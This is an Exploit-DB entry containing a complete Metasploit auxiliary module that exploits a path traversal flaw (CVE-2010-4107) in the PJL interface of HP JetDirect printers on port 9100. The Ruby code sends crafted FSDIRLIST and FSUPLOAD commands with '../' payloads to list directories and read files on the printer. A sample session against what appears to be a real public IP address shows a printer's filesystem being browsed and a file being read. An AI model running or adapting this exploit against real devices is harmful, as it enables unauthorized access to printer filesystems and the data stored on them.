HP JetDirect PJL - Interface Universal Directory Traversal (Metasploit)

EDB-ID:

17635


Author:

Myo Soe

Type:

remote


Platform:

Hardware

Date:

2011-08-07


# Exploit Title: HP JetDirect PJL Interface Universal Path Traversal
# Date: Aug 7, 2011
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://www.hp.com
# Version: All
# Tested on: HP LaserJet Pxxxx Series

##
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


##
# Sample Output:
# 
#
# msf auxiliary(hp_printer_pjl_traversal) > show options
# 
# Module options (auxiliary/admin/hp_printer_pjl_traversal):
# 
#    Name         Current Setting  Required  Description
#    ----         ---------------  --------  -----------
#    INTERACTIVE  false            no        Enter interactive mode [msfconsole Only]
#    RHOST        202.138.16.21    yes       The target address
#    RPATH        /                yes       The remote filesystem path to browse or read
#    RPORT        9100             yes       The target port
# 
# 
# msf auxiliary(hp_printer_pjl_traversal) > run
# 
# [*] cd / ...
# [+] Server returned the following response:
# 
# . TYPE=DIR
# .. TYPE=DIR
# bin TYPE=DIR
# usr TYPE=DIR
# etc TYPE=DIR
# hpmnt TYPE=DIR
# hp TYPE=DIR
# lib TYPE=DIR
# dev TYPE=DIR
# init TYPE=FILE SIZE=9016
# .profile TYPE=FILE SIZE=834
# tmp TYPE=DIR
# 
# 
# msf auxiliary(hp_printer_pjl_traversal) > set INTERACTIVE true
# INTERACTIVE => true
# msf auxiliary(hp_printer_pjl_traversal) > set RPATH /hp
# RPATH => /hp
# msf auxiliary(hp_printer_pjl_traversal) > run
# 
# [*] Entering interactive mode ...
# [*] cd /hp ...
# [+] Server returned the following response:
# 
# . TYPE=DIR
# .. TYPE=DIR
# app TYPE=DIR
# lib TYPE=DIR
# bin TYPE=DIR
# webServer TYPE=DIR
# images TYPE=DIR
# DemoPage TYPE=DIR
# loc TYPE=DIR
# AsianFonts TYPE=DIR
# data TYPE=DIR
# etc TYPE=DIR
# lrt TYPE=DIR
# 
# [*] Current RPATH: /hp
# [*] -> 'quit' to exit
# [*] ->'/' to return to file system root
# [*] ->'..' to move up to one directory
# [*] ->'!r FILE' to read FILE on current directory
# 
# [*] Enter RPATH:
# $ > webServer/config
# [*] cd /hp/webServer/config ...
# [+] Server returned the following response:
# 
# . TYPE=DIR
# .. TYPE=DIR
# soe.xml TYPE=FILE SIZE=23615
# version.6 TYPE=FILE SIZE=45
# 
# 
# [*] Current RPATH: /hp/webServer/config
# [*] -> 'quit' to exit
# [*] ->'/' to return to file system root
# [*] ->'..' to move up to one directory
# [*] ->'!r FILE' to read FILE on current directory
# 
# [*] Enter RPATH:
# $ > !r version.6
# [*] cat /hp/webServer/config/version.6 ...
# [+] Server returned the following response:
# 
# WebServer directory version.  Do not delete!
# 
# 
# [*] Current RPATH: /hp/webServer/config
# [*] -> 'quit' to exit
# [*] ->'/' to return to file system root
# [*] ->'..' to move up to one directory
# [*] ->'!r FILE' to read FILE on current directory
# 
# [*] Enter RPATH:
# $ > quit
# [*] Exited ... Have fun with your Printer!
# [*] Auxiliary module execution completed



require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Tcp

	def initialize(info={})
		super(update_info(info,
			'Name'        => 'HP JetDirect PJL Interface Universal Path Traversal',
			'Version'     => '$Revision: 1 $',
			'Description'	=> %q{
				This module exploits path traveresal issue in possibly all HP network-enabled printer series, especially those which enable Printer Job Language (aka PJL) command interface through the default JetDirect port 9100. 
				With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified.
			},
			'Author'      => [
					'Moritz Jodeit <http://www.nruns.com/>', # Bug Discoverer
					'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module					
					],
			'License'     => MSF_LICENSE,
			'References'     =>
			[
				[ 'CVE', '2010-4107' ],
				[ 'URL', 'http://www.nruns.com/_downloads/SA-2010%20003-Hewlett-Packard.pdf' ],				
				[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02004333' ],				
				[ 'URL', 'http://www.irongeek.com/i.php?page=security/networkprinterhacking' ],
				[ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-laserjet-printer.rb' ],
				[ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-OfficeJet-Printer.rb' ],
				[ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ]
			],
			'DisclosureDate' => '2010-11-15'))
		
		register_options(
		[

			OptString.new('RPATH',
					[
						true,
						"The remote filesystem path to browse or read",
						"/"
					]
				),
			OptBool.new('INTERACTIVE',
								[
									false,
									"Enter interactive mode [msfconsole Only]",
									false
								]
							),
				
			Opt::RPORT(9100)
		],self.class)
		

	end

	def run
		mode = datastore['INTERACTIVE']

		if mode	== true
			set_interactive(datastore['RPATH'])
		else
			set_onetime(datastore['RPATH'])
		end
	end
	
	def set_interactive(spath)
		action = 'DIR'
		rpath =  spath
		rfpath = ''
		tmp_path = ''
		tmp_file = ''
		cur_dir = '/'
		
		print_status("Entering interactive mode")
		stop = false
		
		set_onetime(rpath)
		
		until stop == true		
			print_status("Current RPATH: #{rpath}")
			print_status("-> 'quit' to exit")
			print_status("->'/' to return to file system root")
			print_status("->'..' to move up to one directory")
			print_status("->'!r FILE' to read FILE on current directory\r\n")
			print_status("Enter RPATH:")
			print("$ > ")

			tmp_path = gets.chomp.to_s	
			

			if tmp_path =~ /\.\./ && rpath.length > 2
				old_path = rpath
				new_path = rpath[0,rpath.rindex('/')]
				if new_path != nil
					rpath = new_path
				else
					rpath = '/'
				end
				rpath = '/' if rpath.length == 0
				print_status("Change to one up directory: #{rpath}")
			elsif tmp_path =~ /\!r\s/	
				cur_dir = rpath
				tmp_file = tmp_path.gsub('!r ','')
				rfpath = cur_dir + '/' + tmp_file
				rfpath = rfpath.gsub('//','/')	
				action = 'FILE'
				
			elsif tmp_path == '/'
				rpath = '/'
			elsif rpath != '/' 
			   	rpath = rpath + '/' << tmp_path
			else
				rpath = rpath  << tmp_path
			end
			if rpath =~ /quit/
				stop= true
				rpath = '/'
				print_status("Exited ... Have fun with your Printer!")
			else
				rpath = rpath.gsub('//','/')	
				if action == 'FILE'
					set_onetime(rfpath,action)
					cur_dir = rpath
				else
					set_onetime(rpath,action)
				end
				action = 'DIR'	
			end
		end
	end 
	
	def set_onetime(spath,saction =  datastore['ACTION'])
		
		rpathx  = spath
		action = saction
		rpathx = '/' if rpathx =~ /\/quit/

		connect
		
		dir_cmd = "\x1b%-12345X@PJL FSDIRLIST NAME=\"0:/../../../[REPLACE]\" ENTRY=1 COUNT=99999999\x0d\x0a\x1b%-12345X\x0d\x0a"
		file_cmd = "\x1b%-12345X@PJL FSUPLOAD NAME=\"0:/../../../[REPLACE]\" OFFSET=0 SIZE=99999999\x0d\x0a\x1b%-12345X\x0d\x0a"
		
		if action =~ /DIR/ 
			r_cmd = dir_cmd.sub("[REPLACE]",rpathx)
			print_status("cd #{rpathx} ...")
		else 
			r_cmd = file_cmd.sub("[REPLACE]",rpathx)
			print_status("cat #{rpathx} ...")	
		end 
		
 		
		
		recv = sock.put(r_cmd)
		res = sock.get(-1,1)
		
		if (!res)
			print_error("ERROR in receiving data!\r\n")
		else
			if res.to_s =~ /ERROR/ 
				print_error("Operation Not Permitted or File/DIR Not Found!\r\n")
				disconnect
				return
			end
			resx = res.to_s[res.index("\r\n")+1,res.length]
			print_good("Server returned the following response:\r\n#{resx}")
		end
		
		disconnect	
	
	end


end